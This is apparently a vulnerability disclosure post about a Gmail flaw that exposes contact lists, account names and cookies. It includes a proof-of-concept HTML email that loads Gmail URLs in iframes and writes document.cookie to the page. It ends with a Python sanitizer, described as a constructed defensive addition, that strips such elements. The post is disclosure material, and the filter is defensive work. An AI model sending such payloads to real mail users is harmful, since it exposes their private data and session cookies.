Hello:
After I found a bug in Gmail in the variable 'zx' a short time ago, I say Gmail
reveals the contact list to remote users, discloses the account name, and
allows gaining access to the account if the cookie is active, and with some
URLs one can list contacts, labels or other information to send to the
attacker's web site:
A situation or a proof of concept:
1- Send a mail to a Gmail account, the information is the same... (no
spamming please :D)
2- In this email, which you send in HTML format, you can take two actions:
2.1 Include code in the HTML of this email (mail.html)
2.2 Send a link and wait for users to click on it...
If the Gmail cookie is active and the user clicks on it, any user can view
this information and can use it or send it to other sites via a web form or
others.
Sample of Mail.html
<html>
<head>
<title>Gmail disclosure informatio Xploit</title>
<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">
</head>
<body>
<table width="80%" border="0" align="center">
<tr>
<td><h5> <strong><font face="verdana">contact
list of gmail</font></strong>
<iframe height="100%" id="iframe" width="100%"
frameborder="0"
src="http://gmail.google.com/gmail?view=page&name=contacts&ver="
></iframe>
</h5></td>
</tr>
<tr>
<td height="21"> <h5><strong>user´s
name
account</strong><script>document.write(document.cookie)</script>
<iframe height="100%" id="iframe" width="100%"
frameborder="0" src="http://gmail.google.com/gmail?view=ca&file=2&zx="
></iframe>
</h5></td>
</tr>
<tr>
<td height="48"> <h5> user account options
<iframe height="100%" id="iframe" width="100%"
frameborder="0"
src="https://www.google.com/accounts/CheckCookie?chtml=LoginDoneHtml"></iframe>
</h5></td>
</tr>
<tr>
<td height="48"><script>document.write(document.cookie)</script> </td>
</tr>
</table>
</body>
</html>
Sincerely:
Lostmon (Lostmon@gmail.com)
--
Curiosity is what makes the mind move....
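
A defensive counterpart to the sample mail above, added here as an example and not part of the original post: a Python filter that a mail renderer could run over an HTML body to drop the iframe and script elements and inline event handlers that the sample relies on, and to report what it removed. The names MailScanner and sanitize_mail_html and the sample markup (with a placeholder host) are constructed for illustration.

```python
from html import escape
from html.parser import HTMLParser

# Elements that load or run active content. Only those with a closing tag
# open a "skip" region; embed and frame are void elements.
DROP_WITH_BODY = {"script", "iframe", "object"}
DROP_VOID = {"embed", "frame"}

class MailScanner(HTMLParser):
    """Rebuild mail markup without active content and record what was cut."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings, self.out, self._skip = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_BODY or tag in DROP_VOID:
            # Record the element and its source before dropping it.
            self.findings.append((tag, dict(attrs).get("src") or "(inline)"))
            if tag in DROP_WITH_BODY:
                self._skip += 1
            return
        if self._skip:
            return
        kept = []
        for name, value in attrs:
            if name.startswith("on"):  # inline event handler, e.g. onclick
                self.findings.append(("handler", name))
            else:
                kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_BODY:
            self._skip = max(0, self._skip - 1)
        elif not self._skip and tag not in DROP_VOID:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:  # text inside a dropped element is discarded
            self.out.append(escape(data, quote=False))

def sanitize_mail_html(markup):
    scanner = MailScanner()
    scanner.feed(markup)
    scanner.close()
    return "".join(scanner.out), scanner.findings

# Constructed sample modelled on the structure of mail.html (placeholder host).
SAMPLE = ('<p onclick="x()">contact list</p>'
          '<iframe src="http://mail.example.test/contacts"></iframe>'
          '<script>document.write(document.cookie)</script><b>end</b>')
```

An unclosed iframe or script leaves the skip region open, so everything after it is dropped rather than rendered.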